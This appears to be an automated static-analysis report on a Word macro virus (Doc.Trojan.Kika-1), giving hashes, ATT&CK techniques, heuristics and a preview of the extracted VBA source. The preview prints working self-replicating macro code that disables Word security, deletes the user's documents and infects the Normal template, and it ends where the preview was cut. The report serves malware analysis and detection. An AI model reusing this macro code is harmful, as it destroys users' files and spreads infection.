Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5fa1f7a0b8456509…

MALICIOUS

Office (OLE)

Size: 43.5 KB
Created: 1997-09-17 10:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 5bceb2793bc89e55508df27441c241b7
SHA-1: f2c9e4d3f97ec484463494af1c2a44a48bf5becf
SHA-256: 5fa1f7a0b84565093be4a0dbddc9ee67bb78104c4dad626750bd06914539de9a
Risk score: 220

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1059 Command and Scripting Interpreter

The critical OLE_VBA_SHELL heuristic indicates a Shell() call within the VBA macros. The Document_Open macro runs automatically when the document is opened, and it attempts to disable Word security features and to delete files. The ClamAV detection 'Doc.Trojan.Kika-1' further supports the malicious nature of the file. The macro also attempts to clear existing module code and rename components, which is consistent with a self-propagation or obfuscation mechanism.

Heuristics (5)

  • ClamAV: Doc.Trojan.Kika-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Kika-1
  • VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6023 bytes
SHA-256: 2490837dfbf29698cfd9dd2cc45b3e1dff58984a9b7b5ae6cc326329c48abf0d

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "KIKA"
Attribute VB_Base = "1Normal.KIKA"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Application.ShowVisualBasicEditor = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\security", "Level") = 1&
CommandBars("Tools").Controls("Macro").Visible = False
Options.VirusProtection = (1 - 1)
Options.ConfirmConversions = (1 - 1)
Options.SaveNormalPrompt = False
Application.EnableCancelKey = wdCancelDisabled
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\", "kikaviruz") <> "by BAMBAM" Then
Kill ("c:\Mis documentos\*.*")
Kill ("C:\My documents\*.*")
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\", "kikaviruz") = "by BAMBAM"
Set FRED = ActiveDocument.VBProject.VBComponents.Item(1)
Set PETER = NormalTemplate.VBProject.VBComponents.Item(1)
Shell ("LABEL C: KIKA"), vbMinimizedNoFocus
BETY = PETER.Codemodule.CountOFlines
BILMA = FRED.Codemodule.CountOFlines
bambam = 2
If FRED.Name <> "KIKA" Then
 If BILMA > 0 Then FRED.Codemodule.Deletelines 1, BILMA
    Set Ainfectar = FRED
    FRED.Name = "KIKA"
    hacerAD = True
    PEBELLS = PEBELLS + (Chr(65 + Int(Rnd * 26)))
End If
If PETER.Name <> "KIKA" Then
If BETY > 0 Then PETER.Codemodule.Deletelines 1, BETY
     Set Ainfectar = PETER
     PETER.Name = "KIKA"
     hacerNT = True
     PEBELLS = PEBELLS + (Chr(65 + Int(Rnd * 22)))
End If
If hacerNT <> True And hacerAD <> True Then GoTo byebye
 If hacerNT = True Then
Do While FRED.Codemodule.Lines(1, 1) = ""
  FRED.Codemodule.Deletelines 1
  PEBELLS = PEBELLS + (Chr(65 + Int(Rnd * 22)))
 Loop
 Ainfectar.Codemodule.AddFromstring ("Private Sub Document_Close()")
 Do While FRED.Codemodule.Lines(bambam, 1) <> ""
   Ainfectar.Codemodule.insertlines bambam, FRED.Codemodule.Lines(bambam, 1)
   bambam = bambam + 1
Loop
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("Sub ViewVbCode()")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("MsgBox ") + (Chr(34) + "Its KIKA VIRUZ    Ja,ja,ja...  : )" + Chr(34)) + "," + "vbokoNLY," + Chr(34) + "Alt-F11  hmmm..." + Chr(34)
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("End Sub")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("Sub HelpAbout()")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("MsgBox ") + ((Chr(34) + "Sorry " + (Chr(34)) + "+" + "Application.UserName" + "+" + (Chr(34)) + ", but... you have KIKA VIRUZ by BAMBAM. (c)copywrong. " + Chr(34)))
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("End sub")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("Sub ToolsMacro()")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("MsgBox") + (Chr(34)) + "I know you  " + (Chr(34) + "+" + "application.username" + "+" + Chr(34) + " and i'm observing you " + Chr(34))
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("End Sub")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("Sub FileTemplates()")
bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("End Sub ")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("Sub help()")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("On error resume next")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("Assistant.Visible = True")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, (" With Assistant.NewBalloon")
 
... (truncated)